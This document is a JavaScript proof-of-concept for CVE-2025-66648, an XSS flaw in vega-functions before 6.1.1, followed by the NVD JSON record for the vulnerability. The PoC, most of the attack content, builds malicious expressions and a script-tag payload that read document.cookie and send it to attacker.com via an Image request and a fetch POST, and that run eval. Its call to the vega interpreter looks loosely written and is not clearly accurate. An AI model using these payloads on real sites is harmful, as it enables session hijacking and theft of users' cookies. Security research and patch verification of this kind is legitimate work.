CVE-2025-66648

// CVE-2025-66648 XSS PoC for vega-functions < 6.1.1 // This PoC demonstrates how malicious expressions can execute arbitrary JavaScript // Malicious expression payload const maliciousExpression = ` // Attempt to access internal function and execute XSS (function(){ // Steal cookies/session data var stolen = document.cookie; // Send data to attacker controlled endpoint new Image().src = 'https://attacker.com/steal?data=' + encodeURIComponent(stolen); // Execute arbitrary code eval('alert("XSS via vega-functions CVE-2025-66648")'); })() `; // Example attack vector through vega expression parser function exploitVegaExpression() { const vega = require('vega-functions'); // User-supplied input containing malicious payload const userInput = maliciousExpression; try { // Parse and execute the malicious expression const interpreter = vega.expressionInterpreter; const result = interpreter(userInput); console.log('Expression executed:', result); } catch (e) { console.log('Error:', e.message); } } // Example: Crafting XSS payload for web application using vega const xssPayload = '<script>\n' + 'fetch("https://attacker.com/api/steal", {\n' + ' method: "POST",\n' + ' body: JSON.stringify({cookies: document.cookie})\n' + '});\n' + '</script>'; // The attacker injects this as user input that gets processed by vega-functions

{"cve": {"id": "CVE-2025-66648", "sourceIdentifier": "[email protected]", "published": "2026-01-05T22:15:51.400", "lastModified": "2026-02-05T21:27:13.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vega-functions provides function implementations for the Vega expression language. Prior to version 6.1.1, for sites that allow users to supply untrusted user input, malicious use of an internal function (not part of the public API) could be used to run unintentional javascript (XSS). This issue is fixed in vega-functions `6.1.1`. There is no workaround besides upgrading. Using `vega.expressionInterpreter` as described in CSP safe mode does not prevent this issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vega-functions_project:vega-functions:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "6.1.1", "matchCriteriaId": "FED9629A-DA28-4F2E-8E62-E895759E77A0"}]}]}], "references": [{"url": "https://github.com/vega/vega/security/advisories/GHSA-m9rg-mr6g-75gm", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}